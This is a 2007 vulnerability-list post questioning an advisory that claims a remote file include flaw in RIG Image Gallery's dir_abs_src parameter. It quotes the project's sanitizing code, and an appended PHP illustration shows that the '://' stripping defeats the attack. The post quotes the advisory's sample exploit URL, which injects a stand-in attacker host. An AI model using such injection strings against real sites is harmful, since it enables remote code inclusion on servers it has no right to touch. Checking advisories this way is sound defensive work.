[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
George A. Theall
theall at tenablesecurity.com
Tue Jul 31 02:06:16 UTC 2007
Another advisory from ilker Kandemir:
http://archives.neohapsis.com/archives/bugtraq/2007-07/0365.html
Sample exploit:
check_entry.php?dir_abs_src=http://attacker.php?
Actual code from 2006-06-24_v10:
---- snip, snip, snip ----
function rig_check_src_file($name)
{
...
// disable auto-globals from CGI params -- RM 20060624 - v1.0
ini_set("register_globals", "0");
// complain if that didn't work
if (ini_get("register_globals") == 1)
{
echo "<h1>RIG Security Error</h1>";
...
exit;
}
...
$name = str_replace("..", ".", str_replace("://", "", $name));
...
return $name;
}
...
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));
---- snip, snip, snip ----
By the way, there is no executable PHP code before the function definition.
I don't think any version of PHP allows for changing register_globals
via ini_set() -- see <http://us3.php.net/manual/en/ini.php#ini.list> --
which is probably why the author checks whether it is set and exits if
so. But regardless, the str_replace() later on in rig_check_src_file()
would certainly void the possibility of a remote file include attack.
George
--
theall at tenablesecurity.com
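As an added illustration (not RIG's own code and not from the advisory), the two str_replace() calls quoted above replayed against the advisory's sample value for $dir_abs_src, concatenated the way the require_once() line does it; rig_sanitize_src() and is_remote_include() are names chosen here, and the register_globals checks at the end only confirm that ini_set() cannot change that directive at runtime (it was removed entirely in PHP 5.4):

```php
<?php
// Added example, not RIG's code: replays the post's sanitizer against the
// advisory's payload to see whether a remote include could survive it.

// Mirrors the two str_replace() calls quoted from rig_check_src_file().
function rig_sanitize_src(string $name): string
{
    return str_replace("..", ".", str_replace("://", "", $name));
}

// True if $path still starts with a URL scheme and would therefore be
// resolved through a stream wrapper (http://, ftp://, php://, ...),
// which is what a remote file include needs.
function is_remote_include(string $path): bool
{
    return (bool) preg_match('~^[a-z][a-z0-9+.\-]*://~i', $path);
}

// The advisory's sample value for $dir_abs_src, appended to exactly as
// the require_once(rig_check_src_file($dir_abs_src . "entry_point.php"))
// line does it.
$dir_abs_src = "http://attacker.php?";
$raw  = $dir_abs_src . "entry_point.php";
$safe = rig_sanitize_src($raw);

printf("before: %s  remote=%s\n", $raw,  is_remote_include($raw)  ? "yes" : "no");
printf("after:  %s  remote=%s\n", $safe, is_remote_include($safe) ? "yes" : "no");

// The register_globals guard: ini_set() returns false because the directive
// is not changeable at runtime (PHP_INI_PERDIR) and no longer exists in
// PHP >= 5.4, so the "== 1" check in RIG never fires on a sane install.
var_dump(ini_set("register_globals", "0"));
var_dump(ini_get("register_globals") == 1);
```

After sanitizing, the "after" path carries no scheme and require_once() resolves it as a local relative file name, which is the point of the post: the "://" strip removes the remote-include vector the advisory claims.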